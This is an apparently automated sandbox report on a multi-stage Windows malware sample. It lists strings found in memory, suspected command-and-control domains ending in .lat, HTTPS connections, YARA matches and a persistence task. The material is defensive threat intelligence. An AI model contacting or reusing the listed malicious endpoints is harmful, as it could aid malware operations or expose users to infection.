                              Source: 2i7672.exe, 00000005.00000003.1960896276.0000000000872000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000003.1961193067.0000000000872000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961816047.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/k
                              Source: 2i7672.exe, 00000005.00000003.1960896276.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961723351.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
                              Source: 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                              Source: fc1570cd0d.exe, 00000011.00000002.2295811888.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://sci.libertyreserve.com/
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                              Source: fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                              Source: 5813f66ed1.exe, 0000000C.00000003.2113307590.0000000005B25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                              Source: 5813f66ed1.exe, 0000000C.00000003.2164097213.000000000603C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                              Source: 5813f66ed1.exe, 0000000C.00000003.2164097213.000000000603C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                              Source: 3m20j.exe, 0000000A.00000003.2333057472.000000000C0DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                              Source: 3m20j.exe, 0000000A.00000003.2186629951.0000000005E8D000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2486440512.0000000000D24000.00000040.00000001.01000000.0000000D.sdmp, 5813f66ed1.exe, 0000000C.00000003.2113704300.0000000005B23000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2113307590.0000000005AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                              Source: 5813f66ed1.exe, 0000000C.00000003.2113307590.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                              Source: 3m20j.exe, 0000000A.00000003.2186629951.0000000005E8D000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2486440512.0000000000D24000.00000040.00000001.01000000.0000000D.sdmp, 5813f66ed1.exe, 0000000C.00000003.2113704300.0000000005B23000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2113307590.0000000005AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                              Source: 5813f66ed1.exe, 0000000C.00000003.2113307590.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                              Source: 2i7672.exe, 00000005.00000003.1960896276.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961723351.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat:443/api;
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2504860835.000000000BFC3000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                              Source: 5813f66ed1.exe, 0000000C.00000003.2065972108.0000000001126000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2065900770.0000000001169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                              Source: 5813f66ed1.exe, 0000000C.00000003.2065972108.0000000001126000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2190681116.0000000001122000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2290875133.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2504860835.000000000BFC3000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/about/
                              Source: 5813f66ed1.exe, 0000000C.00000003.2164097213.000000000603C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                              Source: 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                              Source: 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                              Source: 5813f66ed1.exe, 0000000C.00000003.2164097213.000000000603C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                              Source: 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                              Source: 3m20j.exe, 0000000A.00000003.2333057472.000000000C0DB000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164097213.000000000603C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                              Source: 5813f66ed1.exe, 0000000C.00000003.2164097213.000000000603C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                              Source: 3m20j.exe, 0000000A.00000003.2333057472.000000000C0DB000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164097213.000000000603C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50241
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50246
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50239 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49762 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49767 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49773 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49775 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49780 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49834 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49841 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49854 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49862 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49864 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49872 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49902 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49907 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49908 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49919 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49921 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49928 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49937 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49947 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49957 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50206 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50209 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50210 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50211 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50212 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50215 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50217 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50218 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50219 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50222 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50223 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50224 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50227 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50229 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50235 version: TLS 1.2
                              Source: ae64e67a81.exe, 00000013.00000003.2353600190.0000000005140000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_077d69e8-d
                              Source: ae64e67a81.exe, 00000013.00000003.2353600190.0000000005140000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_393958b6-f
                              Source: Yara matchFile source: 19.3.ae64e67a81.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 20.3.svchost.exe.54a0000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 19.3.ae64e67a81.exe.5140000.6.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 20.3.svchost.exe.5280000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 19.3.ae64e67a81.exe.5140000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 19.3.ae64e67a81.exe.5140000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000013.00000003.2353600190.0000000005140000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000003.2361634003.0000000005280000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000003.2353783136.0000000005360000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000003.2361824287.00000000054A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ae64e67a81.exe PID: 1664, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7824, type: MEMORYSTR

                              System Summary

                              barindex
                              .NET source code contains very large array initializations
                              Source: 17.2.fc1570cd0d.exe.46ece18.1.raw.unpack, Aexb5XGUHWH0ZbfQ2k.csLarge array initialization: PYRp7SOSm: array initializer size 360688
                              PE file contains section with special chars
                              Source: 4l693L.exe.0.drStatic PE information: section name:
                              Source: 4l693L.exe.0.drStatic PE information: section name: .idata
                              Source: 4l693L.exe.0.drStatic PE information: section name:
                              Source: 3m20j.exe.1.drStatic PE information: section name:
                              Source: 3m20j.exe.1.drStatic PE information: section name: .idata
                              Source: 1I15f6.exe.2.drStatic PE information: section name:
                              Source: 1I15f6.exe.2.drStatic PE information: section name: .idata
                              Source: 2i7672.exe.2.drStatic PE information: section name:
                              Source: 2i7672.exe.2.drStatic PE information: section name: .idata
                              Source: 2i7672.exe.2.drStatic PE information: section name:
                              Source: skotes.exe.3.drStatic PE information: section name:
                              Source: skotes.exe.3.drStatic PE information: section name: .idata
                              Source: random[1].exe.4.drStatic PE information: section name:
                              Source: random[1].exe.4.drStatic PE information: section name: .idata
                              Source: random[1].exe.4.drStatic PE information: section name:
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name:
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name: .idata
                              Source: 5813f66ed1.exe.4.drStatic PE information: section name:
                              Source: random[1].exe0.4.drStatic PE information: section name:
                              Source: random[1].exe0.4.drStatic PE information: section name: .idata
                              Source: random[1].exe0.4.drStatic PE information: section name:
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name:
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name: .idata
                              Source: 941d08ea4f.exe.4.drStatic PE information: section name:
                              Source: random[1].exe2.4.drStatic PE information: section name:
                              Source: random[1].exe2.4.drStatic PE information: section name: .idata
                              Source: random[1].exe2.4.drStatic PE information: section name:
                              Source: ae64e67a81.exe.4.drStatic PE information: section name:
                              Source: ae64e67a81.exe.4.drStatic PE information: section name: .idata
                              Source: ae64e67a81.exe.4.drStatic PE information: section name:
                              Source: random[3].exe.10.drStatic PE information: section name:
                              Source: random[3].exe.10.drStatic PE information: section name: .idata
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: section name:
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: section name: .idata
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFD62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,10_2_6BFD62C0
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00DF1F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_00621F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00621F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_003E1F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF3BA20_2_00DF3BA2
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF5C9E0_2_00DF5C9E
